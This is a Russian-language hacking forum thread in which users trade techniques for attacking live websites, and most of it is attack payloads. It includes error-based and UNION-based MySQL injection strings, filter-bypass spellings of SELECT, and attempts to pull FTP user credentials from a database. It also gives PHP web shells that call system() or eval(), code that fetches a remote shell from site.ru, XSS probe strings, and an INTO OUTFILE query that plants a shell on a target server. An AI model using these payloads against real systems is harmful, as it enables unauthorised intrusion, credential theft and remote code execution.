Если включен вывод ошибок, то попробуйте Code: or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
вывод ошибок выключен версию смог вывести подзапросом в слепую, но дальше тупик. select в подзапросах фильтруется
пробуй: %53%45%4C%45%43%54 /*!SELECT*/ /*!12345SELECT*/ если mysql5 /*!%53%45%4C%45%43%54*/ SeLeCT SEL/**/ECT
во всех вариантах кроме последнего редиретит на главную страницу. последний запрос SEL/**/ECT не редиректит, но выдает неверный результат
to durito может ссылку кинешь? че гадать то.. to MastaBass1 файл .htaccess не формирует страницу, а локально переопределяет настройки сервера для текущей директории и во всех внутренних поддиректориях. В добавок он меняет настройки php.
Вот смотрите есть Адрес Сервера 82.137.162.97 это универский сервер) как на него можно зайти с домашнего компа ?) препод сказал, что на него можно зайти даже через эксплориал, только как?
Люди, а если через скуль записать в пхп файл что то типа <?php include(http://site.ru/shell.php ?> прокатит? Будет работать?
Будет, но чтобы шелл проинклудился, директива allow_url_include на сервере, должна быть в положении On.
Если есть права на инклюд внешних файлов - то да. А почему бы тебе не писать туда сразу чот тип Code: <?php system($_GET['command']);?> ?
Он не спросил, что ему лучше писать, а спросил, будет ли работать конкретный пример. И ненадо советовать лить system, так как эта функция может не работать на сервере (отключена через disable_functions) или на нее могут быть наложены ограничения (safe mod - on, с установленной директивой safe_mode_exec_dir) и плюс ко всему, это не очень рационально, так как набор команд у system ограничен лишь системными командами и если на сервере нету установленных качалок, то залить полноценный шелл становится проблематично, лучше использовать eval или assert.
У вас нарушен синтаксис. Попробуйте так: PHP: <? copy('http://site.ru/shell.php','1.php'); ?> И при заходе на 1.php будет шелл.
Попытка - не пытка. А говоря о eval, и assert, они с таким же успехом могуть быть отключены... хотя, и реже... Да мне прост первый вариант если не пашет внешний инклюд в голову влетел - писать system()
помогите понять на живом примере: хочу выяснить есть ли xss уязвимость на сайте делаю раз: вставляю код проверки "><script>alert()</script> получаем я так пеонимаю фильтр стоит или все таки сработало? делаю два: Просто в поле вводим: '';!--"<test>=&{()} получаем пропало слово тест,что это значит? Дальше открываем html страничку и ищем слово "test" и смотри последующие сиволы.. <> - они остались значит фильтра нет? ';!--" - оно все так и осталось значит это второе знамение о том что фильтр не робит и я нашел уязвимость???
Вообщем имеется сайт. Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log bd работает под root, file_priv Y Прочитать конфиг сервера через load_file() не получается почемуто = \ Так же в ошибке я вижу путь вида /home/u1234/site.ru/www/file.php В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками: id, userid, passwd, uid, gid, homedir Но проблема в том что я из колонок таким запросом немогу ничего вывести. +union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpuser+limit+0,1+--+ Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке) Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
Code: +union+select+1,'<?php eval($_GET[e])?>',3,4,5,6,7,8,9,10+into+outfile+'/home/u1234/site.ru/www/shell.php'+--+ шелл будет тут site.ru/shell.php да там есть уязвимость